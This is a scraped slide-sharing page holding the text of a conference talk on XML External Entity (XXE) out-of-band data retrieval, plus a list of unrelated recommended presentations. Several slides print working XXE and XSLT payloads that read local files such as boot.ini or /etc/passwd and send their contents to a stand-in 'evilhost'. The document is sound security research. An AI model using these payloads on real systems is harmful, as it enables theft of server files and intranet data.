xml out of band data retrieval
play

XML Out-Of-Band Data Retrieval Timur Yunusov Alexey - PowerPoint PPT Presentation

Jun 25, 2023 •274 likes •750 views

XML Out-Of-Band Data Retrieval Timur Yunusov Alexey Osipov Who we are Timur Yunusov: Web Applica8on Security Researcher Interna8onal forum on

  1. XML ¡Out-­‑Of-­‑Band ¡Data ¡Retrieval ¡ Timur ¡Yunusov ¡ Alexey ¡Osipov ¡

  2. Who ¡we ¡are ¡ • Timur ¡Yunusov: ¡ – Web ¡Applica8on ¡Security ¡Researcher ¡ – Interna8onal ¡forum ¡on ¡prac8cal ¡security ¡«Posi8ve ¡ Hack ¡Days» ¡developer ¡ • Alexey ¡Osipov: ¡ – AFack ¡preven8on ¡mechanisms ¡Researcher ¡ – Security ¡tools ¡and ¡Proof ¡of ¡Concepts ¡developer ¡ • SCADA ¡StrangeLove ¡team ¡members ¡

  3. Agenda ¡ • XML ¡Overview ¡ • XML ¡eXternal ¡En88es ¡ • En88es ¡in ¡aFributes ¡ • Out-­‑Of-­‑Band ¡aFack ¡ – DTD ¡ – XSLT ¡ • Summary ¡ • Demos ¡ • Ques8ons ¡

  4. XML ¡OVERVIEW ¡

  5. XML ¡overview ¡ • Very ¡popular ¡protocol ¡lately ¡ – Serializa8on ¡ – SOA-­‑architecture ¡(REST, ¡SOAP, ¡OAuth) ¡ – Human-­‑readable ¡(at ¡least ¡intended ¡to ¡be) ¡ • Many ¡parsers/many ¡op8ons ¡controlling ¡ behavior ¡(over ¡9000) ¡ ¡ • Many ¡xml-­‑extensions ¡like ¡XSLT, ¡SOAP, ¡XML ¡ schema ¡ ¡

  6. XML ¡overview ¡ • Many ¡opportuni8es ¡lead ¡to ¡many ¡ vulnerabili8es: ¡ – Adobe ¡(@agarri_fr, ¡spasibo) ¡ – PostgreSQL ¡(@d0znpp), ¡PHP, ¡Java ¡ • Many ¡hackers ¡techniques ¡

  7. XML ¡EXTERNAL ¡ENTITY ¡

  8. XML ¡enAAes ¡ • En88es: ¡ – Predefined ¡ ¡ &amp; ¡&lt; ¡&#37; ¡ – General ¡ ¡ <!ENTITY ¡general ¡“hello”> ¡ – Parameter ¡ ¡ <!ENTITY ¡% ¡param ¡“hello”> ¡ • General ¡and ¡parameter ¡en88es ¡may ¡be: ¡ – Internal ¡(defined ¡in ¡current ¡DTD) ¡ – External ¡(defined ¡in ¡external ¡resource) ¡

  9. XXE ¡impact ¡ • Local ¡file ¡reading ¡ • Intranet ¡access ¡ • Host-­‑scan/Port-­‑scan ¡ • Remote ¡Code ¡Execu8on ¡(not ¡so ¡o_en) ¡ • Denial ¡of ¡Service ¡

  10. XXE ¡techniques ¡ • XML ¡data ¡output ¡(basic) ¡ • Error-­‑based ¡XXE ¡ – DTD ¡(invalid/values ¡type ¡defini8on) ¡ – Schema ¡valida8on ¡ • Blind ¡techniques ¡ ¡ – XSD ¡values ¡bruteforce ¡(@d0znpp) ¡

  11. Error ¡based ¡output ¡ • Schema ¡valida8on ¡In ¡Xerces ¡ parser ¡error ¡: ¡Invalid ¡URI: ¡: [file] ¡ I/O ¡warning ¡: ¡failed ¡to ¡load ¡external ¡en8ty "[file]“ ¡ parser ¡error ¡: ¡DOCTYPE ¡improperly ¡terminated ¡ Warning: ¡*** ¡ [file] ¡in ¡*** ¡on ¡line ¡11 ¡ <!DOCTYPE ¡html[ ¡ <!ENTITY ¡% ¡foo ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ %foo;]> ¡

  12. XML ¡constraints ¡ • XML ¡validity/well-­‑formedness ¡ – WFC: ¡No ¡External ¡En8ty ¡References ¡… ¡ in ¡aBributes ¡ – WFC: ¡No ¡< ¡in ¡AFribute ¡Values ¡ – WFC: ¡PEs ¡in ¡Internal ¡Subset ¡

  13. Parameter ¡enAAes ¡ resolve/validaAon ¡algorithm ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡html ¡[ ¡ <!ENTITY ¡% ¡internal ¡SYSTEM ¡"local_file.xml"> ¡ %internal;]> ¡ <!ENTITY ¡8tle ¡"Hello, ¡World!"> ¡]> ¡ <html>&8tle;</html> ¡ local_file.xml: ¡ <!ENTITY ¡8tle ¡"Hello, ¡World!"> ¡

  14. XXE ¡aJacks ¡restricAons ¡ • XML ¡parser ¡reads ¡only ¡valid ¡xml ¡documents ¡ – No ¡binary ¡=( ¡ ¡ ¡ ¡ ¡ (hFp://www.w3.org/TR/REC-­‑xml/#CharClasses) ¡ ¡ – Malformed ¡first ¡string ¡(no ¡encoding ¡aFribute) ¡ (Some ¡parsers) ¡ – But ¡we ¡have ¡wrappers! ¡ • Resul8ng ¡document ¡should ¡also ¡be ¡valid ¡ – No ¡external ¡en88es ¡in ¡aFributes ¡

  15. ENTITIES ¡IN ¡ATTRIBUTES ¡

  16. System ¡enAAes ¡restricAons ¡ ¡bypass ¡within ¡aJributes ¡ Well-­‑formed ¡constraint: ¡ ¡ – No ¡External ¡En8ty ¡References ¡ • So, ¡this ¡is ¡not ¡possible, ¡right? ¡ <!DOCTYPE ¡root[ ¡ ¡<ENTITY ¡internal ¡SYSTEM ¡"file:///etc/passwd"> ¡ ]> ¡ <root ¡aFrib="&internal;“/> ¡ ¡

  17. System ¡enAAes ¡restricAons ¡ ¡bypass ¡within ¡aJributes ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡root ¡[ ¡ <!ENTITY ¡% ¡remote ¡SYSTEM ¡"hFp://evilhost/evil.xml"> ¡ %remote; ¡ <!ENTITY ¡internal ¡'[boot ¡loader] ¡8meout ¡***'> ¡ %param1; ¡]> ¡ <root ¡aFrib="&internal;" ¡/> ¡ Evil.xml ¡ <!ENTITY ¡% ¡payload ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ <!ENTITY ¡% ¡param1 ¡"<!ENTITY ¡internal ¡'%payload;'>"> ¡

  18. PaJern ¡validaAon ¡ ¡ ¡ ¡ ¡<xs:restric8on ¡base="xs:string"> ¡ ¡ ¡ ¡ ¡ ¡ ¡<xs:paFern ¡value="&test;" ¡/> ¡ ¡ ¡ ¡ ¡</xs:restric8on> ¡

  19. DEMO ¡

  20. OUT-­‑OF-­‑BAND ¡ATTACK ¡

  21. XXE ¡aJacks ¡restricAons ¡ Server-­‑side ¡in ¡general ¡(except ¡Adobe ¡XXE ¡SOP ¡ bypass) ¡

  22. XXE ¡OOB ¡

  23. XXE ¡OOB ¡ What ¡other ¡OOB ¡communica8on ¡techniques ¡are ¡ present? ¡ ¡ DNS ¡exfiltra8on ¡via ¡SQL ¡Injec8on ¡(@stamparm) ¡ UTL_HTTP.REQUEST ¡ ¡ xp_fileexist ¡ Dblink ¡ LOAD_FILE ¡

  24. XXE ¡OOB ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡root ¡[ ¡ <!DOCTYPE ¡root ¡SYSTEM ¡ “hBp://evilhost/xml.xml”> ¡ <!ENTITY ¡% ¡remote ¡SYSTEM ¡"hFp://evilhost/evil.xml"> ¡ <root> ¡ ¡ ¡ ¡&trick; ¡ %remote; ¡ </root> ¡ %int; ¡ <!ENTITY ¡% ¡trick ¡SYSTEM ¡'hFp://evil/?%5Bboot%20'> ¡ %trick;]> ¡ Evil.xml ¡ <!ENTITY ¡% ¡payl ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ <!ENTITY ¡% ¡int ¡" ¡ <!ENTITY ¡&#37; ¡trick ¡SYSTEM ¡'hFp://evil/?%payl;'> ¡ "> ¡

  25. XXE ¡OOB ¡ DTD ¡Parsing, ¡ SYSTEM ¡reading ¡ XML ¡ AFacker ¡ Server ¡ PROFIT! ¡

  26. Parsing ¡restricAons ¡ • Beside ¡restric8ons ¡of ¡all ¡en88es ¡there ¡are ¡also ¡ new ¡ones ¡ • “PEReferences ¡forbidden ¡in ¡internal ¡ subset” ¡(c) ¡XML ¡Specifica8on ¡ – So ¡we ¡should ¡be ¡able ¡to ¡read ¡some ¡external ¡ resource ¡(local ¡or ¡remote) ¡ – Wrappers ¡

  27. Parsing ¡restricAons ¡ • Quotes ¡are ¡blocking ¡defini8on ¡of ¡en88es ¡ – One ¡should ¡try ¡single/double ¡quotes ¡when ¡ defining ¡en8ty ¡ ¡ <!ENTITY ¡% ¡int ¡"<!ENTITY ¡&#37; ¡trick ¡‘[file ¡ content’]’>" ¡ • Space/new ¡line/other ¡whitespace ¡symbols ¡ should ¡not ¡appear ¡in ¡URI ¡ – Wrappers ¡again ¡=) ¡ – Or ¡not ¡even ¡needed ¡

  28. Vectors ¡ • Depending ¡on ¡parser ¡features ¡– ¡lack ¡of ¡DTD ¡ valida8on ¡in ¡main ¡document ¡doesn’t ¡mean ¡ lack ¡of ¡valida8on ¡everywhere. ¡Some ¡possible ¡ clues: ¡ – External ¡DTD ¡or ¡Internal ¡DTD ¡subset ¡from ¡external ¡ data ¡ – Parameter ¡en88es ¡only ¡ – XSD ¡Schema ¡ – XSLT ¡template ¡

  29. Vectors ¡ • <!DOCTYPE ¡root ¡SYSTEM ¡“…”> ¡ • <!ENTITY ¡external ¡PUBLIC ¡“some_text” ¡“…”> ¡ • <tag ¡xsi:schemaLoca8on=“…”/> ¡ ¡ • <tag ¡xsi:noNamespaceSchemaLoca8on=“…”/> ¡ ¡ • <xs:include ¡schemaLoca8on=“…”> ¡ • <xs:import ¡schemaLoca8on=“…”> ¡ • <?xml-­‑stylesheet ¡href=“…”?> ¡

  30. XSLT ¡OUT-­‑OF-­‑BAND ¡

  31. XSLT ¡OOB ¡ • Controlling ¡XSLT ¡transforma8on ¡template ¡we ¡ can ¡access ¡some ¡data ¡from ¡sensi8ve ¡host: ¡ <xsl:variable ¡name="payload" ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡select="document('hBp://sensiXve_host/',/)"/> ¡ <xsl:variable ¡name="combine" ¡ ¡ ¡ ¡ ¡ ¡select="concat('hBp://evilhost/', ¡$payload)"/> ¡ <xsl:variable ¡name="result" ¡ ¡ ¡ ¡ ¡ ¡select="document($combine)" ¡/> ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 51 / 89 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4

344 views • 17 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 68 / 91 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4 2

729 views • 24 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 68 / 91 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4 2

579 views • 8 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 28 / 89 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4

455 views • 23 slides
Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets

Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets

1 Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets are common Family birthdays Remotely sensed images (NASA) Retrieval by Content appealing as datasets get large Find similar

388 views • 36 slides
XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web

XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web

XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web in Web in Practice Practice Sihem Amer-Yahia Mariano Consens Yahoo! Research University of Toronto In collaboration with: Ricardo Baeza-Yates

1.06k views • 59 slides
Data Organization - B-trees Data organization and retrieval File organization can improve data

Data Organization - B-trees Data organization and retrieval File organization can improve data

Data Organization - B-trees Data organization and retrieval File organization can improve data retrieval time 100 blocks SELECT * FROM depositors 200 recs/block Query returns 150 records WHERE bname=Downtown Ordered File Heap Brighton

1.07k views • 80 slides
1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3

1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3

1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3 Semantic Gap? 1.4 Challenges of automated multimedia indexing 2 Basic multimedia search technologies 2.1 Meta-data driven retrieval 2.2 Piggy-back text

902 views • 56 slides
Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray

Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray

The he mul ulti ti-wavele elength ngth mul ulti ti-tempor temporal al sk sky Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray band -ray band TeV band Radio/microwave band Infra red

692 views • 42 slides
The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding,

The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding,

The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding, BBL Lindsay Addison, Audubon NC AMOY Band Database Data sharing agreement: Data submitted to the American Oystercatcher Band Database will

240 views • 9 slides
Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525-

Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525-

Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525- 3182 Ext. 160 Email: darienorr@sps186.org Benefits of Band Band provides the opportunity to create. Band builds a sense of community,

286 views • 9 slides
Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was

Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was

Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was approached by Red Sky wanting some graphic design work done for the band. Band Briefing Logo Business Card Letterhead T Shirt Poster Logo

810 views • 23 slides
Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using

Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using

Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using Query Independent Features using Query Independent Features Yiqun Liu, Min Zhang, Liyun Ru, Shaoping Ma State Key Lab of Intelligent Tech. &amp;

313 views • 27 slides
NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews:

NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews:

NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews: Oct 12th: Cupertino Oct 19th: Santa Cruz Boardwalk Nov 2nd: Pismo Beach Nov 9th : Merced Uniforms Checks are important: Shoes, black socks,

550 views • 9 slides
Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm.

Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm.

Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm. Procedure: For 29 months of data (Aug. 2003 - Dec. 2005), 1) Using both IR &amp; MW data, do cloud clearing and retrieval. If the retrieval passes

229 views • 22 slides
Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality

Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality

Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality Portal (WQP) 11/20/2014 U.S. EPA Region 5 Water Division Slide 6 of 10 Managed and supported by EPA It is the official EPA repository for

223 views • 11 slides
Semi-supervised Question Retrieval with Gated Convolutions Tao Lei joint work with Hrishikesh

Semi-supervised Question Retrieval with Gated Convolutions Tao Lei joint work with Hrishikesh

Semi-supervised Question Retrieval with Gated Convolutions Tao Lei joint work with Hrishikesh Joshi, Regina Barzilay, Tommi Jaakkola, Kateryna Tymoshenko, Alessandro Moschitti and Llus Mrquez NAACL 2016 QCRI/MIT-CSAIL Annual Meeting

716 views • 32 slides
Retrieving Target Gestures Toward Speech Driven Animation with Meaningful Behaviors N AJMEH S

Retrieving Target Gestures Toward Speech Driven Animation with Meaningful Behaviors N AJMEH S

Retrieving Target Gestures Toward Speech Driven Animation with Meaningful Behaviors N AJMEH S ADOUGHI AND C ARLOS B USSO Multimodal Signal Processing (MSP) lab The University of Texas at Dallas Erik Jonsson School of Engineering and Computer

303 views • 29 slides
Storage and Retrieval Cycle A storage and retrieval (S/R) cycle is one complete roundtrip from

Storage and Retrieval Cycle A storage and retrieval (S/R) cycle is one complete roundtrip from

Storage and Retrieval Cycle A storage and retrieval (S/R) cycle is one complete roundtrip from an I/O port to slot(s) and back to the I/O Type of cycle depends on load carrying ability: Carrying one load at-a-time (load carried on a

669 views • 17 slides
Goals Advance math-aware search Advance semantic analysis of mathematical notation and

Goals Advance math-aware search Advance semantic analysis of mathematical notation and

ARQ Math Answer Retrieval for Questions on Math https://www.cs.rit.edu/~dprl/ARQMath #ARQMath Richard Zanibbi, Anurag Agarwal, Behrooz Mansouri, and Wei Zhong Douglas W. Oard rxzvcs@rit.edu, axasma@rit.edu, bm3302@rit.edu, wxz8033@rit.edu

569 views • 7 slides
Digital preservation at Wellcome Alex Chan ~ a.chan@wellcome.ac.uk ~ they/them Senior

Digital preservation at Wellcome Alex Chan ~ a.chan@wellcome.ac.uk ~ they/them Senior

Digital preservation at Wellcome Alex Chan ~ a.chan@wellcome.ac.uk ~ they/them Senior software developer at Wellcome Collection Image: The Anatomical Theatre at Cambridge. Published for R. Ackermann's History of Cambridge Wellcome

326 views • 32 slides
Utilizing Knowledge Bases for Text Retrieval: A Wishlist for Text Retrieval: A Wishlist

Utilizing Knowledge Bases for Text Retrieval: A Wishlist for Text Retrieval: A Wishlist

Utilizing Knowledge Bases for Text Retrieval: A Wishlist for Text Retrieval: A Wishlist Utilizing Knowledge Bases Laura Dietz dietz@cs.unh.edu KG4IR https://kg4ir.github.io Retrieval for Open-ended Information Needs Requiring long, complex

392 views • 28 slides
Information Retrieval Evaluation (COSC 488) Nazli Goharian nazli@cs.georgetown.edu @ Goharian,

Information Retrieval Evaluation (COSC 488) Nazli Goharian nazli@cs.georgetown.edu @ Goharian,

Information Retrieval Evaluation (COSC 488) Nazli Goharian nazli@cs.georgetown.edu @ Goharian, Grossman, Frieder, 2002, 2012 Measuring Effectiveness An algorithm is deemed incorrect if it does not have a right answer. A

501 views • 20 slides
Darmstadt Knowledge Processing Repository Based on UIMA Iryna Gurevych, Max Mhlhuser,

Darmstadt Knowledge Processing Repository Based on UIMA Iryna Gurevych, Max Mhlhuser,

Darmstadt Knowledge Processing Repository Based on UIMA Iryna Gurevych, Max Mhlhuser, Christof Mller, Jrgen Steimle, Markus Weimer, Torsten Zesch Ubiquitous Knowledge Processing Group Telecooperation, Computer Science Department

372 views • 19 slides

More recommend